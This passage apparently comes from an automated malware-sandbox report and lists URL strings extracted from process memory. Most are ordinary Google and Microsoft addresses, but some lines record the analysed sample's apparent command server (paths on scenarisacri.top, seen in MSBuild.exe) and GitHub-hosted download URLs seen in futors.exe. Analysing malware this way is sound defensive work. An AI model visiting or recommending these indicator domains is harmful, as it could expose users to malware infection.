Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 0000002D.00000002.1763406635.00005B0400580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1843799682.00005B0401568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 0000002D.00000002.1772711956.00005B0400A84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/ebapp
Source: chrome.exe, 0000002D.00000002.1846887338.00005B0401988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1773955833.00005B0400B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1789787283.00005B040121C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1779009107.00005B04010F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002D.00000002.1846887338.00005B0401988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1789787283.00005B040121C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultdefault
Source: chrome.exe, 0000002D.00000002.1779009107.00005B04010F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultdler7
Source: chrome.exe, 0000002D.00000002.1846404832.00005B04018E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776282589.00005B0400CF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 0000002D.00000002.1845374902.00005B0401628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776784011.00005B0400E04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1774896937.00005B0400B6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 0000002D.00000002.1845374902.00005B0401628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776784011.00005B0400E04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1774896937.00005B0400B6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 0000002D.00000003.1652434713.00005B000065C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
Source: chrome.exe, 0000002D.00000002.1845374902.00005B0401628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776784011.00005B0400E04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1774896937.00005B0400B6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 0000002D.00000002.1776483889.00005B0400D60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763732000.00005B0400610000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: json[1].json.27.dr String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&amp;riverAgeMinutes=2880&amp;navAgeMin
Source: json[1].json.27.dr String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: powershell.exe, 00000005.00000002.908984573.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.984922811.000001552BBF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.984922811.000001552BD36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: futors.exe, 0000002B.00000003.1703799874.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://objects.githubusercontent.com/
Source: futors.exe, 0000002B.00000003.1703799874.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://objects.githubusercontent.com/$
Source: futors.exe, 0000002B.00000003.1857430983.00000000008D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/953100962/0fb6522f-c6fd
Source: futors.exe, 0000002B.00000003.1697859830.00000000008A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/954811811/dc4de189-3672
Source: chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogads-pa.clients6.google.com
Source: chrome.exe, 0000002D.00000002.1750136215.000001F7DA697000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/Ge
Source: chrome.exe, 0000002D.00000002.1790205773.00005B0401260000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 0000002D.00000002.1774579785.00005B0400B60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1791396054.00005B0401324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1788058649.00005B04011A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841155266.00005B0401474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1791396054.00005B0401324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1788058649.00005B04011A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841155266.00005B0401474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 0000002D.00000002.1842191858.00005B040151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1791396054.00005B0401324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1788058649.00005B04011A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841155266.00005B0401474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1791396054.00005B0401324000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 0000002D.00000002.1791396054.00005B0401324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1788058649.00005B04011A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841155266.00005B0401474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 0000002D.00000002.1791396054.00005B0401324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1788058649.00005B04011A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841155266.00005B0401474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 0000002D.00000002.1842611687.00005B0401528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1842191858.00005B040151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1696267841&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 0000002D.00000002.1842611687.00005B0401528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1842191858.00005B040151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1788058649.00005B04011A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1728324084&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 0000002D.00000002.1842611687.00005B0401528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1842191858.00005B040151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1788058649.00005B04011A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1739808228&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 0000002D.00000002.1842191858.00005B040151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1788058649.00005B04011A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1739808249&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 0000002D.00000002.1842611687.00005B0401528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1842191858.00005B040151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1739894676&target=OPTIMIZATION_TARGET_CLI
Source: chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1791396054.00005B0401324000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 0000002D.00000002.1842611687.00005B0401528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776059865.00005B0400C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1788058649.00005B04011A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=240731042075&target=OPTIMIZATION_TARGET_S
Source: chrome.exe, 0000002D.00000002.1842191858.00005B040151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1841886768.00005B0401504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=5&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 0000002D.00000003.1716539122.00005B0400684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1716667387.00005B0401114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1716476239.00005B0401700000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.office.com/calendar/
Source: chrome.exe, 0000002D.00000002.1774532350.00005B0400B4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://passwords.google/
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://people.googleapis.com/
Source: chrome.exe, 0000002D.00000002.1845939127.00005B0401738000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chrome.exe, 0000002D.00000003.1672187166.00005B04012EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776483889.00005B0400D60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763732000.00005B0400610000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 0000002D.00000002.1764451261.00005B04008F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 0000002D.00000002.1764451261.00005B04008F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 0000002D.00000002.1763231323.00005B040052C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: MSBuild.exe, 00000018.00000002.1573999949.00000000012C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://scenarisacri.top/
Source: MSBuild.exe, 00000018.00000002.1573999949.00000000012C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://scenarisacri.top/M
Source: MSBuild.exe, 00000018.00000002.1574435036.00000000012DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://scenarisacri.top/gHSAYuqo
Source: MSBuild.exe, 00000018.00000002.1573999949.00000000012C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://scenarisacri.top/gHSAYuqo&
Source: MSBuild.exe, 00000018.00000002.1574913267.00000000012F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://scenarisacri.top/gHSAYuqoWRY
Source: MSBuild.exe, 00000018.00000002.1574435036.00000000012D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://scenarisacri.top/gHSAYuqoy
Source: MSBuild.exe, 00000018.00000002.1574435036.00000000012DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://scenarisacri.top/ment
Source: chrome.exe, 0000002D.00000002.1761614499.00005B0400094000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyA2KlwBX3mkFo30om9LU
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777604042.00005B0400F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 0000002D.00000002.1777183033.00005B0400EB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846561770.00005B040193C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776282589.00005B0400CF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002D.00000002.1763406635.00005B0400580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: chrome.exe, 0000002D.00000002.1763772489.00005B040064C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1690091310.00005B0400640000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome?p=desktop_tab_groups
Source: chrome.exe, 0000002D.00000002.1777604042.00005B0400F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: svchost.exe, 0000000F.00000003.1369040945.0000021485041000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000F.00000003.1369022633.0000021485049000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369625543.0000021485042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369602878.0000021485037000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000F.00000002.1369602878.0000021485037000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369690877.0000021485059000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000F.00000002.1369572980.000002148502B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1369690877.0000021485059000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: 68qi5p.27.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
Source: chrome.exe, 0000002D.00000002.1777350807.00005B0400EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20Y&
Source: chrome.exe, 0000002D.00000003.1671766690.00005B04015E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 0000002D.00000002.1846617251.00005B0401950000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 0000002D.00000003.1690364771.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Source: chrome.exe, 0000002D.00000002.1790205773.00005B0401260000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 0000002D.00000002.1774532350.00005B0400B4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/#safe
Source: chrome.exe, 0000002D.00000002.1772750526.00005B0400AA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/browser-features/
Source: chrome.exe, 0000002D.00000002.1772750526.00005B0400AA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/browser-tools/
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 0000002D.00000002.1776784011.00005B0400E04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1776248128.00005B0400CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846404832.00005B04018E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 0000002D.00000002.1762097403.00005B0400174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1767884735.00005B0400928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1844256638.00005B0401578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763053242.00005B04004E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1763959544.00005B04006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777350807.00005B0400EF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: chrome.exe, 0000002D.00000002.1763406635.00005B0400580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
Source: chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 0000002D.00000002.1763330286.00005B040055C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 0000002D.00000003.1652434713.00005B000065C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 0000002D.00000003.1651077521.00005B0000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 0000002D.00000003.1652434713.00005B000065C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.managerForcedOn_PlusAddressAndroidOpenGmsCoreManagementP
Source: chrome.exe, 0000002D.00000003.1652434713.00005B000065C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.managerPlusAddressOfferCreationIfPasswordFieldIsNotVisib
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 0000002D.00000002.1761614499.00005B0400094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1772224335.00005B0400978000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 0000002D.00000003.1717414295.00005B0401B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1690007828.00005B04017C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1847775694.00005B0401ACC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717249840.00005B0401B1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717195221.00005B0401B14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.VtzkEync3_c.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.Rc_yzHk8ifQ.L.W.O/m=qmd
Source: 68qi5p.27.dr String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: chrome.exe, 0000002D.00000002.1772711956.00005B0400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1843799682.00005B0401568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
